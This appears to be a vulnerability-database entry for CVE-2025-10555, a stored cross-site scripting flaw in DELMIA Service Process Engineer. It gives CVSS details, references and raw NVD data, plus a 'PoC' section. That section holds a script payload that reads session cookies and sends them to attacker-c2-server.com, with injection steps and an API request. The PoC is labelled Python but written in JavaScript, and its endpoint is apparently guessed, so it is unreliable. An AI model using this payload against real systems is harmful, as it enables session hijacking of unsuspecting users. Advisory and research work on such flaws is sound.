CVE-2025-10555

Description

A stored Cross-site Scripting (XSS) vulnerability affecting Service Items Management in DELMIA Service Process Engineer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

DELMIA Service Process Engineer R2025x (所有版本)

3DEXPERIENCE R2025x (受影响版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-10555 PoC - Stored XSS in DELMIA Service Process Engineer
// Target: Service Items Management in 3DEXPERIENCE R2025x
// Note: This PoC is for educational and authorized testing purposes only

// Malicious payload to be injected into Service Item name/description field
const xssPayload = '<script>\n'
  + '  // Steal session cookies\n'
  + '  var cookies = document.cookie;\n'
  + '  var xhr = new XMLHttpRequest();\n'
  + '  xhr.open("POST", "https://attacker-c2-server.com/exfil", true);\n'
  + '  xhr.setRequestHeader("Content-Type", "application/json");\n'
  + '  xhr.send(JSON.stringify({\n'
  + '    "cve": "CVE-2025-10555",\n'
  + '    "cookies": cookies,\n'
  + '    "url": window.location.href,\n'
  + '    "userAgent": navigator.userAgent\n'
  + '  }));\n'
  + '</script>';

// Attack flow:
// 1. Attacker with low privilege access logs into 3DEXPERIENCE platform
// 2. Navigate to DELMIA > Service Process Engineer > Service Items Management
// 3. Create new or edit existing Service Item
// 4. Inject XSS payload into name/description field
// 5. Save the Service Item - payload is now stored persistently
// 6. When any user views the affected Service Item, payload executes

// Example API request structure (if API access available):
const exploitRequest = {
  method: 'POST',
  url: '/api/v1/service-items',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <attacker_token>'
  },
  body: {
    name: xssPayload,
    description: 'Malicious Service Item',
    category: 'Test'
  }
};

console.log('CVE-2025-10555 PoC Generated');
console.log('Payload length:', xssPayload.length, 'characters');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10555
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10555
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10555/
[4] VulDB https://vuldb.com/cve/CVE-2025-10555
[5] https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10555

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10555", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:48.047", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-site Scripting (XSS) vulnerability affecting Service Items Management in DELMIA Service Process Engineer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10555", "source": "[email protected]"}]}}